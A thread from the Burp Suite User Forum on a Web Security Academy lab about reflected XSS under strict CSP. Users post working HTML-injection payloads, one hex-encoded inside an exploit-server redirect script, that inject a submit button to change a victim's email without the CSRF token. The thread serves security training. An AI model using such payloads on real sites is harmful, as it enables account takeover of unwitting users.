Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Reflected XSS protected by very strict CSP, with dangling markup attack

Christian | Last updated: Mar 07, 2024 09:13PM UTC

The Lab Lab: Reflected XSS protected by very strict CSP, with dangling markup attack seems to imply that the dangeling attack is required to get the CSRF token and then use it for the attack. But since the CSRF attack is done on the same page that contains the vulnerability, a simple creation of the button (e.g https://0ad9009403628b458156e38d00900034.web-security-academy.net/my-account?email=radssada@dsadnff.com%22%3E%3Cbutton%20type=submit%20%3EClick%3C/button%3E) solves the lab without performing anything else. Is this an intended solution?

Ben, PortSwigger Agent | Last updated: Mar 08, 2024 02:21PM UTC

Hi Christian, Can you confirm the exact steps you are carrying out to solve the lab in this manner so that we can see exactly what you are doing? If it is easier to do this with screenshots then please feel free to email us at support@portswigger.net and we can take a look from there.

Christian | Last updated: Mar 11, 2024 09:31PM UTC

Hi there, using the payload in the first post (?email=radssada@dsadnff.com%22%3E%3Cbutton%20type=submit%20%3EClick%3C/button%3E), it creates a submit button that the victim clicks, and therefore changes its e-mail without requiring the CSRF token to be acquired through the dangling markup attack.

Ben, PortSwigger Agent | Last updated: Mar 13, 2024 10:54AM UTC

Hi Christian, I am struggling to solve the lab with your solution - are you able to email us (support@portswigger.net) with some precise steps so that we can replicate this?

Cezar | Last updated: Mar 14, 2024 01:32PM UTC

Hi Ben, I just solved the lab with the following payload in the exploit server :) <script> location = 'https://0a1f00c604fe24d380abd08200210016.web-security-academy.net/my-account?email=%68%61%63%6b%65%72%40%65%76%69%6c%2d%75%73%65%72%2e%6e%65%74%22%3e%3c%62%75%74%74%6f%6e%20%74%79%70%65%3d%73%75%62%6d%69%74%20%3e%43%6c%69%63%6b%3c%2f%62%75%74%74%6f%6e%3e'; </script>

Ben, PortSwigger Agent | Last updated: Mar 15, 2024 07:54AM UTC